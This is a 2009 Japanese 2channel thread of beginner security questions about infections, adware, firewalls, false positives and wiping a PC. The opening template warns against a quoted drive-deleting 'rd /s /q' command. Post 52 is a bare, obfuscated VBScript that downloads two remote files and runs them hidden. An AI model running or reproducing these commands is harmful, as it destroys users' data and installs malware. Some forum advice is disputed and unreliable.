初心者の方の為のインターネットとパソコンのセキュリティについての質問スレッドです
自習を出来るリンクを紹介していますのでご参考にして下さい
━ 質問マナー ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
・ アドバイスをもらう為に、「質問用テンプレート」を使って質問しましょう
・ 2回目以降の発言書込は、名前欄に「最初に質問した番号」を半角英数字で入力して下さい
・ 他から誘導されて来た場合は、その旨書いておきましょう
・ アドバイスする方も、解りやすい説明をしてあげて下さい
・ ここは2ちゃんねるですので、正しい解答ばかりとは限りません (用心しましょう)
━ 質問用テンプレート ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
【使用OS】 『』 例、Vista sp1 (「システムのプロパティ」参照)
【PCスペック】 『CPU: GHz 、メモリ: MB』 (「システムのプロパティ」参照)
【使用ブラウザ】 『』 例、Firefox 3
【Microsoft Updateの更新の状態】 『』 例、自動更新設定
【セキュリティソフトと年式】 『』 例、○○○○ 2009
【その他スパイウェア対策ソフト】 『』
【回線の種類・ルータの有無】 『』 例、光回線でルータ使用中
【具体的な症状】 『』
【過程と措置】 『』
【その他】 『』
【スクリーンショット画像やテキストファイルをアップロード出来るサイト】
↓ ※先頭のhを抜いてこっちへリンクして下さい
ImageHost.org
ttp://www.imagehost.org/ (Hotlink のURLを
ttp:// ××.jpg )
●【※要注意】 そそのかされて、この手順を行うとドライブのデータが全て消えてしまいますよ×× ━注意━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ チェックディスクコマンドを試してみろ (リフレッシュコマンドを試してみろ とか・・・) cmd /c rd /s /q c: と入力し[OK] 上記と同様に以下も cmd /c rd /s /q d: cmd /c rd /s /q e: cmd /c rd /s /q f: ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ ●テンプレここまで (*セキュリティ初心者向け情報募集中)
【使用OS】 『XP SP2』 【PCスペック】 『CPU: 2.80GHz 、メモリ: 224MB』 【使用ブラウザ】 『Firefox 3.5』 【Microsoft Updateの更新の状態】 『自動更新は停止状態』 【セキュリティソフトと年式】 『avast! 4.8 Home Edition』 【その他スパイウェア対策ソフト】 『Spybot Search』 【回線の種類・ルータの有無】 『光回線でルータ使用中』 【具体的な症状】 『数分ごとにネガポジ反転したような少女の画像が作業中のウィンドウに出現』 【過程と措置】 『再起動しても復活。win,iniには該当らしき記述なし。madoka、ozawa、hikaru、jenifferなどは検出せず。』 【その他】 『どこかのアップローダーから「ディアボロの大冒険 ver 13.0 .zip」 というファイルを開いて中身のexeを起動してから感染したと思われます。』
>>10 なぜ古いスレから使わない
死ね死にさらせ
もうテンプレに入れようぜ。 八頭 ◆YAGApwSaEw は信用できない投稿者です。
15 :
10 :2009/07/04(土) 17:54:56
>>11 すみません
次回から気をつけます
>>12 迅速な回答ありがとうございます
そのようにします
>>15 1.もう1回ダウンロードして検体提出は問題無い
2.ワクチン化されるのを待つのは大きな間違い。検出できるようにはなるかもしれませんが
ワクチン(除去と設定等復元)は作成されません。あくまでも本体のブロック、削除であり、
本体が変更を加えたWindowsのレジストリなどを正常に復帰させることはできません。
3.セキュリティソフトの対応を待つ間、該当PCは無防備かつ危険な状態に置かれます。
必要なデータが破壊される可能性もありますので、放置して待つような対応は厳禁です。
4.どんなマルウェアであれ、感染した場合は、PCリカバリまたはOS再インストールで復帰させるのが鉄則です。
PCリカバリ(またはOS再インストール)以外の方法では、削除できたと思っても、別の何かが残ってしまう危険を
犯してしまうと、BOTネットに組込まれたり、なんらかの中継に利用されたり、自分の個人情報や、流出させては
いけない情報が流出してしまうなどの危険があります。意図せぬ加害者になってしまうことのないように、早急に
PCリカバリ(OS再インストール)を行なってください。
今後、八頭の言うことは信じちゃダメです。2割り程度はまともなことも混じってるかも知れませんが、
全体としては有害です。
>八頭 ◆YAGApwSaEw 有害だからお前はもう黙れ。
19 :
名無しさん@お腹いっぱい。 :2009/07/04(土) 20:14:32
ポートスキャンって言うので自分のマシーンに潜入されたら2ちゃんの恥ずかしい書き込み とかもばれるんですかね? そういうのってアンチウィルスではガードできないんですか? 普通の家でもルータとかが必要ですか?
>>19 ばれる事は無いと思う。ただ昨今のセキュリティー事情では
ルータ+PFWは必須で、ルータを導入するとルータのWAN側
インターフェイスにグローバルIPアドレスが割り振られる。
つまりWAN側から直にアクセスできるのはルータまでとなり
それより内側にあるPCには直にアクセス出来無い。
PFWのみでも意図的にポートを開放してなければ大丈夫だけど
ハード処理とソフトウエア処理を比較した場合は
ハード処理の方が手堅い。
>>10 感染した=悪意のあるプログラムが取り憑いた
取り憑いた場所、部位にもよるし、書換が行われた場合などでも違ってくる。
無意味なDLLやファイルが残る可能性もあるし…
通常は元に戻そう何て考えない方がいい。アンチウイルスソフトは水際対策だから
感染した場合は素直にインストールし直す事をすすめる。
そのために日頃のバックアップとかが重要になってくる訳で、アンチウイルスソフトも
感染しないようにするためのプログラムと考えて感染後の駆除などは期待しないほうがいい。
【使用OS】 『XP SP3』 【PCスペック】 『CPU: 2.80GHz 、メモリ: 1G』 【使用ブラウザ】 『Firefox 3.011』 【Microsoft Updateの更新の状態】 『自動更新は停止状態』 【セキュリティソフトと年式】 『avast! 4.8 Home Edition』 【その他スパイウェア対策ソフト】 『Spybot Search』『Ad-Aware』『SpywareBlaster』 【回線の種類・ルータの有無】 『光回線でルータ使用中』 【具体的な症状】 『今のところ特になし?』 【過程と措置】 『Spybot→Ad-Aware→トレンドマイクロのオンラインスキャンでは何も発見しないものの 最後にスキャンしたavastのブートタイム検査 でWin32:Adware-gen [Adw]を発見 場所はc:\program files\ntte-rt\toolbar\flets.dll とりあえずチェストに移動』 これは削除しても大丈夫ですかね?
>>23 フレッツ・スクウェアツールバーを使うなら戻す。
使わないなら、戻してツールバーを削除。
名称からわかるように「アドウェア」ですので、残すか消すかは自己責任で判断してください。
"アンチウイルス"による駆除は期待できなくても何らかの方法でマルウェアを 取り除く方法はある。あのカスペルスキーもそう言ってたし そもそも駆除出来ないレベルで改変されてたらパソコン不安定になりまくりだろ。 八頭のなんちゃって駆除も酷いが
>>25 自分で端末を見て、判断できるなら処理すればいいさ。
回線の向こう側の、しかも初心者のPCのメンテなんてできっこない。
PCリカバリ以外の方法を勧めて、なんらかの危険を残してしまうよりいいんでないか?
>>24 どうも。
使わないので削除することにします。
ありがとうございました。
( ゚Д゚)ウマー
【使用OS】 『XP sp2』 【PCスペック】 『CPU: 3.16GHz 、メモリ: 3250MB』 【使用ブラウザ】 『IE』 【Microsoft Updateの更新の状態】 『自動更新設定』 【セキュリティソフトと年式】 『avast』 【その他スパイウェア対策ソフト】 『spybot S&D』 【回線の種類・ルータの有無】 『光回線でルータ使用中』 【具体的な症状】 『ashServ.exeが十分おきぐらいに作動してCPUの30%ぐらいを食ってしまいます。 それだけならいいのですが、なぜか作動中はインターネットの通信が全て遮断されてしまい、 ネット関連の作業は何も出来なくなります。』 【過程と措置】 『一度、avastを消して再インストールを試みましたが、特に変化なし。 ashServ.exeはタスクマネージャからの強制終了も受け付けません。』
>>29 C:\Program Files\Alwil Software\Avast4\ashServ.exe
avastスレの1に相談だな
>>31 流石だな。回答のスキルが違うwww誰とは言わないが
自演ウザいなw
アバストスレで荒らせなくなった中国人だろw
都合が悪くなると直ぐに自演扱いか?www
>>20 の回答は俺だけど
>>31 は俺では無い
だから自演するなってw
38 :
29 :2009/07/05(日) 19:05:39
取り敢えず、そのオートギアってのを使ってみます。 でも通信が遮断されるのは何でだろ?
オートギア昔使ったことあるけど 優先度の操作はかえってシステム全体が不安定になるよ
>>25 22です
老婆心ながら、例えばウイルスを作成する場合に、アンチウイルスをすり抜けさせるために
取り憑くプログラムの注入部位をいろいろ変化させたりしていますが、アンチウイルスが
駆除するときはその注入された部位全てを取り除く訳ではなく、機能しなくなる範囲での抹消です。
プログラム自体は少し位中身を変更しても動くもので、(実際にプログラムが動いて次に
CALLする場所周辺を消してコンパイルしても普通に動くものです)
よく見かけるのは「駆除前にバックアップし、駆除したことを確認してからバックアップを削除」
ですが、元通りにできるのであれば必要ない訳ですよね。
アンチウイルス全体をみれば分かりますが、検出精度を主体にしていて駆除率を掲げてはいません。
悪意のあるプログラムに因っては変化するアルゴリズムを持ち、読み込まれると変異して自ら変化し
ながら動き回るものもあり、駆除が難しいことは各ベンダーも十分分かっていると思います。
駆除といっても本来のウイルスの動作を封じるだけの場合もあり、完全に取り除くことが難しい
ウイルスも存在していることは周知の事実であり、F-Secure でも
"ウイルスの感染部位や感染の状況によっては、正しく駆除されない場合があり"
となっています。
セキュリティ初心者質問スレッドなので… 変に対処しないでリカバリを勧めたいです。
長文にて失礼
AV-TESTによるウイルス検出率テスト(2009年6月23日実施、検体数758,547)
http://antivirus-news.net/2009/06/avtestg-data20symantec.html 順位 プログラム 検出数 検出率
#1 G Data 2009 757052 99.80% (AVAST!+BitDefender+独自検出 )
#2 Symantec 755146 99.55%
#3 F-Secure 2009 735273 96.93% (5つのマルウェア検出エンジンを搭載 )
#4 McAfee 732570 96.58%
#5 Kaspersky 731730 96.46%
#6 Microsoft 729229 96.13%
#7 Trend Micro 726146 95.73% (ウイルスバスター )
#8 Eset Nod32 718122 94.67%
#9 K7 Computing 668839 88.17% (ソースネクスト ウイルスセキュリティZERO )
#10 Rising 587824 77.49% (瑞星 ウイルスキラー )
*本データは、ウイルス対策ニュース・ドットネットがAV-TESTから入手し発表しているもの。テスト日は6月23日。
*AV−TESTは、ドイツのマグデブルク大学にある、ウイルス検出率をテスト評価する第三者機関。主宰は、アンドレアス・マークス。
*アジア=パシフィック地域、特に日本、台湾、中国において頻発しているウイルスを中心に採集されており、
検体は6ヶ月以内に発生したものに限定されている。今月のテストのサンプル758,547種が使われた。
*テストの対象は、国内で市販されている主要ウイルス対策ソフト(無料製品は除く)。
*ここでいう「ウイルス」とは、「狭義のウイルス」に加えて「ワーム」「トロイの木馬」「ボット」「バックドア」を含む
>>40 リカバリだとC:ドライブは綺麗になるだろうけども
別のドライブにリスクの種が残っている場合は再感染の可能性が充分あるから
感染の種類くらいは特定すべきじゃないかな
>>42 基本的な対応は、PCリカバリして、WindowsUpdateを全て当てた後で、セキュリティソフトを導入してパターンを最新にする。
それから、他のドライブからデータの復旧なりアプリケーションの導入なりをして環境を整える。
この手順を守る限りにおいては、別ドライブに残っているかもしれないものについては、セキュリティソフトがブロック可能です。
ですから、>42のような心配は不要です。かえって、感染状態でいる時間を延ばすことになるので有害です。
また、このスレに相談しにくるようなPC初心者さんが、複数ドライブを使っていたり、別ドライブにデータを分けたり
するような使い方をしている可能性はあんまりないと思います。(相談時の環境で、別ドライブの存在がわかった時だけ
セキュリティソフトの更新が終わるまではそのドライブにアクセスしないように注意してあげれば十分でしょう)
やっぱり、お前さんは、このスレには有害だと思う。
>>42 >>14 ,
>>18
WindowsUpdateやアンチウィルスソフトの更新をする間に 感染する可能性もあるんですよね?
フリーのアンチウィルスソフトをダウンロードするときは無防備でも そのあとスキャンすれば大丈夫なんですか?
46 :
名無しさん@お腹いっぱい。 :2009/07/05(日) 20:39:00
ツールバーにMIRARって出て消せねぇ〜。ちなみにソフトはノートンアンチウイルス2009入れてるんだがウイルス検出されねぇ〜
(ο^д^)ノシ
>>43 >この手順を守る限りにおいては、別ドライブに残っているかもしれないものについては、セキュリティソフトがブロック可能です
>セキュリティソフトの更新が終わるまではそのドライブにアクセスしないように注意してあげれば十分でしょう)
それはあなたがそう思い込んでるだけであって、
たった1枚のエロ画像からでも実際には再感染は起こり得ます
解析結果の画像→
ttp://h.imagehost.org/0509/WS006516.jpg (ありふれた拡張子.Jpegですがリスクの種です)
ですから、もし物理フォーマットで完全解決を薦める場合には、
他のドライブに残るリスクの種(ネットでの取得物など)までも捨て去る様に言わなくてはなりません
これが僕の完全駆除の『基本』です
>PC初心者さんが、複数ドライブを使っていたり、別ドライブにデータを分けたりするような使い方をしている可能性はあんまりないと思います。
失礼ながら、あなたがPC音痴なだけであって
価格.comで、よく売れているPCのGZ-X1BPD-100 は、
ATX/MicroATX でありますが、3.5インチベイ:2個 3.5インチシャドウベイ:5個 5.25インチベイ:4個 です
店頭で根強い人気のPCケースのANTEC SOLO BLACK は、
ATXで、3.5インチベイ:2個 3.5インチシャドウベイ:3個 5.25インチベイ:4個 です
わかりまちたか?
>43
>このスレに相談しにくるようなPC初心者さんが、複数ドライブを使っていたり
確かに。
複数と言ってもCドライブとDドライブだけしかないもんな。
デフォでは
本当に不安なら、データを諦めてもらうってのもアリかもしれませんね。
てか
>>48 おおおおおおおおいw
JPEG.EXEって画像じゃありません。
アイコンは画像のアイコンに偽装されてると思われますが。
肝心な検出結果もモザイク入れて隠して…
どんなスキルのある人でも、分からないだろう…。
補足 >48のURLはVirustotalの結果画像ですが、ソースチェッカーを使って確認し、 各自自己責任にてアクセスしてください
52 :
名無しさん@お腹いっぱい。 :2009/07/05(日) 21:25:41
set v2qf1 = d6d4fd.CreateObject(f2eje0,"") set ste5mp = v2f7e.GetSpecialFolder(2) n5sc6.type = 1 t4get="GET" v4x5i.Open t4get, aurl_0, False v4x5i.Send y1L_wy80= "L_wy80.scr" y1L_wy80= v2f7e.BuildPath(ste5mp,y1L_wy80) n5sc6.open n5sc6.write v4x5i.responseBody n5sc6.savetofile y1L_wy80,2 n5sc6.close v2qf1.ShellExecute y1L_wy80,"","","open",0 v4x5i.Open t4get, aurl_1, False v4x5i.Send y1L_wy81= "L_wy81.exe" y1L_wy81= v2f7e.BuildPath(ste5mp,y1L_wy81) n5sc6.open n5sc6.write v4x5i.responseBody n5sc6.savetofile y1L_wy81,2 n5sc6.close v2qf1.ShellExecute y1L_wy81,"","","open",0
>>46 BHOに登録されたのでしょう。
ブラウザの「アドオンの管理」にMIRARってのがあると思う。
ググったらセーフモードでspybotを使用すれば削除できる報告があった。
>>??
最初の回答ではベンダーからの回答待ち、ウイルストータルでの確認、自動実行の無効化っだたような
即リカバリしないのに、マルウエアの自動起動の無効化さえ指示してない方が完全駆除と言われる。
>>50 ( ´(ェ)`)ノシ
>>N9P3SuvBPo 48は僕が撮ったスクリーンショットだから安全だよw ボカシ入れてるだろ
>53 φ(^。^)ノシ
56 :
名無しさん@お腹いっぱい。 :2009/07/05(日) 21:45:18
八頭 ◆YAGApwSaEw 真土けクズ
すいません、質問です
自作pc手がけてみようと価格.comでパーツを見比べていて
antecのP183というpcケース紹介ページから(
ttp://kakaku.com/item/K0000026883/ )
メーカーサイトへ飛んだんですが、なにかひどい文字化けで。。
パソコンに不調が起きたとかは無いんですが
アメリカでwebサイト改竄が〜とか言っていたのを思い出して不安になってます
>>57 ブラウザのツールバー>表示>エンコード>西ヨーロッパ言語 で文字化け直らない?
CoolerMasterのPCケースも最近いいのがあるね
>57 行って来たけど、文字化けはしてませんでしたけど… 再度アクセスしても文字化けしてるようでしたら、 ページ内を右クリック→エンコード→日本語をクリックしてみて。 webサイト改ざんとか言っても、OSやブラウザやアプリ、対策ソフト類を最新にしてれば、 よほどのことがない限り感染はしませんので安心してください。 ちなみに、エンコード>西ヨーロッパ言語をしたら、俺の環境では文字化けしました。
俺の環境だとIE8でもChromeでも文字化けするわ。 右下の「Global Home」から国を選ぶと正常に表示できる。
ありがとうございます
>>60 氏と同じような感じですね
一応、(無関係だろうけど)GENOウイルス対策はしてあるつもりです
文字化けの出だしがahoなのが何ともでした…
ちなみに右クリック→エンコード→日本語でも文字化けする
自作のキューブ型PC使ってますが後ろのファンは別に無くても大丈夫ですか?
失礼します。パソコン一般総合質問板より誘導されてきました。 【使用OS】 XP Home SP3 【PCスペック】 CPU:Intel Core2 CPU6300 1.86GHz メモリ: 2GB RAM 【使用ブラウザ】 IE・Sleipnir 【Microsoft Updateの更新の状態】 自動更新設定 【セキュリティソフトと年式】 Avast 2009 【その他スパイウェア対策ソフト】 Ad-Aware 【回線の種類・ルータの有無】 光回線でルータ使用中 【具体的な症状】 先日Windowsの自動更新後から、HTMLが全て正常に開けなくなりました。 IEやHTMLファイルを開こうとすると、このファイルを開くか保存しますか?という今まで出なかったダイアログが出て 開くを選択しても開けまぜん。その他の形式(mp3やtxtなど)ファイルは問題なく開けます。 検索エンジン等で調べようにもIEが開けない為、2ちゃんブラウザが正常に動いたのでこちらで質問した次第です。 【過程と措置】 システムの復元をしようとしたんですが、システムの復元というウインドウが出るものの真っ白の状態でそこから何も表示されず 復元出来ませんでした。 【その他】 件の自動更新後ですが、再起動後に右下のタスクトレイに「悪意あるマルウェアを削除しました」と表示され、クリックしたところ、ファイル名がWin32〜から始まるものが数十個表示され そのうちの一つが削除されたという表示がされました。思わずその画面は消してしまったので詳しい内容をおぼえていません。 その後SleipnirやIEを使おうとして今の症状に至ります。 あと、Avastを疑って一度起動してみたんですが、今まで起動できていたのに「Win32モードでは起動できません」と表示され起動できません。 前述の削除されたマルウェアのファイル名にもWin32とありましたが、Win32がなんなのかわからず、検索も出来ない状態なので2ちゃんねるに書き込むことにした次第です。 長文で申し訳ありませんが、ご指導お願いいたします。また、板違いでありましたら誘導していただけたらと思います。
ZoneAlarmのフリーの日本語版が1年も更新されないので移行を考えてます。 Comodoファイアーウォールはよく散見されるように、そんなに設定が難かしいのでしょうか?
>>65 ウイルスなどでおかしくなった環境は、フォーマットしてOSから全部
再インストール(リカバリー)するのが一番確実かつウダウダ悩むより
早い訳だが、それはどうしてもやりたくないのか?
>>66 Comodo Firewall @ Wikiなどの説明の多さを見ただけで敬遠する人も
多いんだろうなw
理解して設定した方が良いのは当然だが、最初は解説サイトの設定例を
丸写しでもすればそんなに面倒臭くもない。
>>65 PCリカバリ。メーカー製でない場合はOS再インストール。
69 :
65 :2009/07/07(火) 14:00:05
>>67-68 ご回答ありがとうございます。やはり再インストールですか。
リカバリしたくないというわけではないのですが、自動更新後おかしくなったということで
ウイルスではなく、Windowsアップデートによる何かの不具合なのかなと思ったもので。
HTMLが開けない以外は正常ぽいので、リカバリせずにいけるならそちらの方がいいと思った次第です。
ピンポイントでIEが起動できなくなるウイルスというのがあるのでしょうか?
他にご回答がないようでしたらリカバリしてみようと思います。ありがとうございました。
70 :
65 :2009/07/07(火) 14:07:44
失礼しました。 >ピンポイントでIEが起動できなくまる →HTMLが開けなくなるの間違いです
>>69 > Windowsアップデートによる何かの不具合
ではなく
>>65 で自ら書いているように
> 悪意あるマルウェアを削除
が原因になる。
悪意のあるマルウェアに今回のトラブルに関連した重要な部分を
置き換えられていて、それらを削除されたから問題が出た、と。
で、どれを削除されたかも覚えてなく、
(ログはどこかにあった気がするが、削除された数が数だし…)
> Win32モードでは起動できません
この手のトラブルまで起きているならリカバリーした方が早い。
HTMLが開けないだけなら、IEの修復などで直りそうだが。
(ο^д^)ノシ
73 :
名無しさん@お腹いっぱい。 :2009/07/07(火) 21:21:14
ポート23015に物凄い勢いでアクセスしている何かがいるんですが これ何ですか。 IP変えたりしながら5秒毎に来るんですが。
不正アクセスでしょ
いや、それはわかっているんですが、 1時間半で1200件というのは今までになかったんですよ。 特定のポート(23015)だけに5秒毎にアクセスするようなボットとかあるんですかね。
/二ニ=-、 /> r-(⌒ヽ⌒ヽ /ソ ̄/ /\ \ ヽ // // |\ |\| / | ヾ | ̄| |万| |馬| |券| |_|
>>76 あなたの環境を教えてください
ここで晒せば少しはRecoveryする奴も減るんじゃね?
IEを使わなければいい
>>76 氏
ロムってる者ですが、そういう情報助かります
>78 とりあえず、XPなら制限ユーザー、Vistaおよび7なら標準ユーザーを常用し、 DEP(データ実行防止)機能を全てのプログラムに対してやっとくこと。 これだけでもかなり違う。 あと件の脆弱性ですが、記事にも書いてあるとおり、 >Windows VistaおよびWindows Server 2008は影響を受けない。 とのことです。 Windows7はどうだろう? XPモード時だとやはり影響受けるのかな?
82 :
名無しさん@お腹いっぱい。 :2009/07/07(火) 23:47:44
scrのファイル踏んでしまった ファイルのほとんどがT605の拡張子で237kbになってしまった ほんとにファイルはあぼーんになったの? どうすればいい? 助けてください。
>82 マルチはらめぇ!!
WinXP で NortonInternetSecurity を使っています。 ファイヤーウォールに関してなんですが、特定の人物からのアクセスを可能な限り 遮断したいと思っています。 IP単位で指定してブロックはわかるのですが、 リモートホスト名を正規表現で指定してブロックすることができるソフトってありませんか? そもそも理屈として無理なのかな?とも思うのですが、 似たようなことを実現できる手法・ソフトがあれば教えてください。
なぜ制限ユーザー? 不便じゃね
2chからAV女優サイトに飛ばされたらTrojan.Zlob が 入ってしまいました、ノートンは入ってますが反応しません。 朝大量に画面が出てよく分からないままで、どうすればいいか 分かりません、お願いします。
ハ,,ハ (゚ω゚ ) おこと ⊂ ⊂) ∧_∧ ⊂二⌒⊂( ゜Д゜) γ 二つ つ { ( ヽ,_)ヽ,_) ハ,,ハ ∧_∧ ( )∩;;)3゙゚').・:; わり Oゝ ノ、 O) / ) ( \ ( / ̄∪ ∪ ̄\) .゚:。。:. :゚ _∩゚:・ . ゚:⊂/ ノ ) / γ .・ し⌒J ゚。: ハ,,ハ ( ゚ ω∩ します ο ノ /_ O '(ノ
【使用OS】 『XP SP3』 【PCスペック】 『CPU:1.73GHz 、メモリ:1.49GB 【使用ブラウザ】 『IE8』 【Microsoft Updateの更新の状態】 『自動更新設定』 【セキュリティソフトと年式】 『ウイルスセキュリティzero 2009年』 【回線の種類・ルータの有無】 『光回線でルータ使用中』 【具体的な症状】 ニコニコ動画サイト全体が読み込めない 【過程と措置】ウイルスセキュリティzeroの設定から、「すべての機能を無効にする」にすると普通に見れるようになる。 このまま無効にしておけばよいといいたいところでしょうが、なんか不安なのでこのセキュリティを起動したまま ニコニコ動画を見れるようにするにはどうしたらよいでしょうか。 【その他】 ようつべは問題なし。
>>90 zeroは辞めた方が良いね。人それぞれかも知れないが
サポートも弱いしオススメはしない。しかも完全削除ツールも
無いから残骸が残る。
NIS、マカ辺りが使いやすいと思う。VBは・・・自己責任でw
他にG DATA、KIS他とかもあるが初心者だとどうかな
>>93 同感。2009版以降のスレ見たり、最近の状況を読んでみたらよい。色々書いてあるけど、
自分で判断すればいいっしょ。McAfeeとか、安定してるから使ってみると良いと思うよ。
【その他】 1.該当ファイルの内容は去年の夏ごろにインストールを行った同人ソフトと考えられる。 2.当然ながら割れ物などではなく、購入先はコミックマーケット(2008年夏)。 3.調べ方が正しいのであれば、該当のウイルスは単体のワームであり、ファイルへの感染は行わない。 4.大手サークルの頒布物であり、現在までウイルス情報もなく、CDにウイルスが入っているとは考えにくい。 5.去年の夏に頒布されたものである為、今になってウイルスとして検出されるとは考えにくい。 現在、以上のような状態になっていますが、本当にこの調べ方/対応方法であっているかどうか、素人の為判断がつきません。 セキュリティについて詳しい皆さんであれば、同様のケースに対する情報等お持ちではないかと思い、ご相談させていただきました。
>>95-96 駆除に関しては問題無いみたいだけど(半年以上検出しなかったのは問題だけど・・・)
文章からして誤検出と判断しているんだろうけども
このケースは意図的な大量配布の可能性もあると思う。
>>6 のIPA情報処理推進機構 (情報セキュリティに関する届出) へ連絡を取って調べてもらうのがいいと思う
*コンピュータウイルスの相談窓口としてコンピュータウイルス110番の電話を設置
なるべく多くのセキュリティベンダへ検体提出してもらうのがいいと思う。
そんなもんでオタオタする奴がなんで >数ポート開放) してんのよ ?
某ブログにF-Secureのオンラインスキャンでも同パスの検出例があった Symantecへは連絡だけしておきました
>>100 GENOの感染経歴もある人のBLOGなら
同じところみましたね。
>>97 >>98 貴重な情報有難うございます。
先ほど検出可否報告スレよりウイルス詰め合わせをダウンロードし検出テストを行った結果、
KAV使用の別の方が検出を行ったものと同数のファイルが検出されました為、
少なくともローカルのKAVの検出機能に障害は発生していないようです。
恐らく皆さんがおっしゃるように語検出ではないかと思いますが、
念の為地霊殿再インストールの後、exeを検体としてIPAに提出しようかと思います。
助言いただき有難うございました。
>>99 使用しているポートは絞っており、ポートスキャンにより他のサービスが動いていないことを確認済みです。
しかしながら、セキュリティに関して絶対の自信を持っているわけではないので、
自分以外の信用が置けるソースからの情報が得られないと不安でなりません。
自分の調べ方に不足が合ったようで、お手数をおかけ申し訳ございませんでした。
重ね重ね有難うございました。
>>102 ついでに神主さんにも教えてあげると良いかも。
>>102 再インストールしないで
まず連絡とって検体提出方法の指示をもらうように
まあ誤検出だろうし 製作者じゃないけど、問題ないだろ 多分
F-SecureのエンジンにはAVPがあったと思う まあ、検出するのも無理はない
>>102 どうやらCDからも検出されたようです
まあ、誤検出確定かも知れんね
>>89 >>14 >>82 >>87 諦めてPCリカバリしろ。
他の方法では対処できません。理由は>40とか>43辺りを読んでください。
>>90 ZEROは使ったこと無いけど、ペアレンタルコントロールかなにか入れてないか?
子供に有害なサイトを見させないためのフィルタリングで引っ掛かってるだけじゃないかな。
個人的にはそんなソフト捨てて、もっとまともなセキュリティソフトを入れなさいと。
>>95-96 行なった手順を読む限りでは、誤検出の可能性が高いと思う。
自分が使用しているセキュリティベンダー宛に、誤検出として検体提出を。
カスペの検体提出先は Kaspersky Lab <newvirus☆kaspersky.com> ☆をアットマークに置き換えてください。
1.一時的にセキュリティソフトを切って、該当ファイルをパスワード付きZIPで圧縮する。
パスワードは"infected"。
2.セキュリティソフトを再度有効に戻す。
3.メールタイトルに「False detection」または「False Positive」と入れる。
メール本文もタイトルと同一文面。
メール本文には、そのほか、回答パスワードも記載。「Extract Password : infected」
4.圧縮したファイルを添付して送信する。
5.あとはパターンの修正を待つ。
(このほかに、隔離してから提出する方法もあります)
八頭が勧めているIPAへの届け出は行なわなくていいです。というかやっちゃだめです。
あそこへの届け出は「実際に感染した」という報告なので、誤検出かもしれないものを報告する窓口ではありません。
>>104 役立たずどころか迷惑になる可能性の高い回答してんじゃねーよ。
頼むから、お前はもう出てこないでくれ。質問者にも、他の回答者にも迷惑がかかる。
108 名前: あぼ〜ん [あぼ〜ん] 投稿日: あぼ〜ん あぼ〜ん 109 名前: あぼ〜ん [あぼ〜ん] 投稿日: あぼ〜ん あぼ〜ん
111 :
名無しさん@お腹いっぱい。 :2009/07/08(水) 05:32:54
■ おすすめ2ちゃんねる 開発中。。。 by FOX ★ このスレを見ている人はこんなスレも見ています。(ver 0.20) クボタタケシ Part.2 [HIPHOP] 【社会】日本に帰化した韓国人男性、対馬の自衛隊施設で不可解行動=施設内に記載された演習日程や人員配置など書き写す [ニュース二軍+] ●朝鮮の反日企業 口ッテ製品不買運動 4品目 ● [ハングル] 【B's社長】アルビサポスレPART34【ありがとう】 [国内サッカー] 都立新宿山吹高校part23 [お受験]
あぼ〜ん
そやけど、これと言ってパッとしない回答ばかりだと思うんだよね 昔のこのスレは自演ばかりだったけど、回答もしっかりとやってたし おいらもこのスレに何度も助けられてる身だから、このスレは参考になると思う 検索サイトで斜め読みしただけのレベルで回答してる奴って正直、いらないんじゃないかと このスレが今日も続いているのは、真面目に回答してる人達がいてこそだよねっ 回答できるスキルは全くないので、ただロムるしかできないけどねおいらは
ハチ! もう帰ってこないんだよ!
>>114 八頭みたいな糞のことですね
わかります
↑これ見て大丈夫なやつですか?
なんで? ただ聞いただけですけど
>>114 そうですね。
真面目に質問に答えてくれる回答者がいて、このスレが成り立ってると言っても過言ではないです。
あと、ROMも勉強になりますからね。
>>123 お前死ねよ
そんなものに興味を持つような奴にセキュやる資格なし
ここは初心者用スレ
初心者が回答する、初心者用スレな
初心者は疑問を文章にまとめる事によって気づく事があり、 玄人は初心者の何気ない書き込みからひらめきを得る。
低能乙
HPの管理人はアクセス解析でどこからアクセスしてるかわかると聞きましたがこういうのはパソコン単位で判別しているのですか? それともリモートホスト?とかIP?とかで判別しているんでしょうか? 例えば同じ家から違うパソコンでアクセスした場合はどのように判別されるんでしょうか?
環境変数。
八頭は居る?
いりませーん
141 :
名無しさん@お腹いっぱい。 :2009/07/09(木) 16:26:28
ハチ ご主人様はもう帰ってこないんだよ ハチ
>>142 こんな糞なトーシロがアドバイスとか笑わせる
145 :
名無しさん@お腹いっぱい。 :2009/07/09(木) 23:23:09
友人にノートパソコンを譲ることになりました。 しかし、そのパソコンは親父が使っていたもので、親父の個人情報などがネットから流出する可能性もあります。 目に付くものは手当たり次第消したのですが、これでは不十分ですよね? リカバリソフトを持っていないのですが、どうしたらそのパソコンの個人情報を極力消去して初期状態に戻すことができますか? ちなみに、その友人が悪用するとかそういうことを気にしているわけではないです。 むしろ、PC関係に疎すぎるのでウイルスとかに感染しないかが心配なのです。 よろしくお願いします。
リカバリーできないPCを素人に譲るなw
147 :
名無しさん@お腹いっぱい。 :2009/07/09(木) 23:36:06
CD無しにはリカバリをあきらめなくてはいけないということでしょうか?
>>145-147 >CD無しにはリカバリをあきらめなくてはいけないということでしょうか?
基本的にはYes。
ノートPCの場合は、メーカーに問い合わせて、リカバリCD(有償)を入手してください。
物によっては、HDDのマウントしていない領域に、リカバリイメージが置かれている場合があり
起動時に特定のキーを押すことでリカバリを開始できるものもあります。
少なくとも、他人に譲渡する際は、リカバリしてからというのが礼儀でしょう。
リカバリできない状態のPCを他人に譲渡するのはやめたほうがいいです。
>>174 リカバリしても未使用領域に記録されたデータはOSからは認識されてないだけで残っている。
復元できてしまう可能性有。
HDDのデータを消去できるソフトで生HDD状態にしてからリカバリするのがBEST。
150 :
149 :2009/07/09(木) 23:57:31
151 :
145 :2009/07/10(金) 00:02:20
>>148 ありがとうございます。
礼儀だったのですね。知らなかったorz
メーカーにまずは問い合わせてみます。
>>149 たとえばどういうソフトのことを言うのでしょうか?
リカバリー=HDDの初期化
だと思ってたのですが違うのですか?
153 :
149 :2009/07/10(金) 00:23:52
